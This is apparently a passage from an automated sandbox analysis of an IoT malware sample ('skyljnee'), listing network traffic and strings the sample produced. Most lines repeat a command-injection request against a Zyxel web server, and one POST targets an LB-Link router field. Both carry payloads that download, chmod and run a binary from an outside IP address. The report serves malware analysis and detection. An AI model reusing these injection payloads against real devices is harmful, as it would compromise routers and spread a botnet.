          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;
          Source: unknownDNS traffic detected: queries for: haha.skyljne.click
          Source: unknownHTTP traffic detected: POST /goform/set_LimitClient_cfg HTTP/1.1Cookie: user=adminData Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.245.236.146/skyljnee.mpsl; chmod 777 skyljnee.mpsl; ./skyljnee.mpsl lblink.selfrep;rm *mpsl*;
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 Jan 2024 03:17:50 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 214Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 68 6f 6d 65 2f 61 70 70 2f 77 65 62 73 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open document: /home/app/webs/goform/set_LimitClient_cfg</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeTransfer-Encoding: chunked
          Source: skyljnee.x86_64-20240128-0910.elfString found in binary or memory: http://103.245.236.146/skyljnee.mips;$
          Source: skyljnee.x86_64-20240128-0910.elfString found in binary or memory: http://103.245.236.146/skyljnee.mpsl;
          Source: skyljnee.x86_64-20240128-0910.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: skyljnee.x86_64-20240128-0910.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
          Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
          Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
          Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
          Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
          Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
          Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
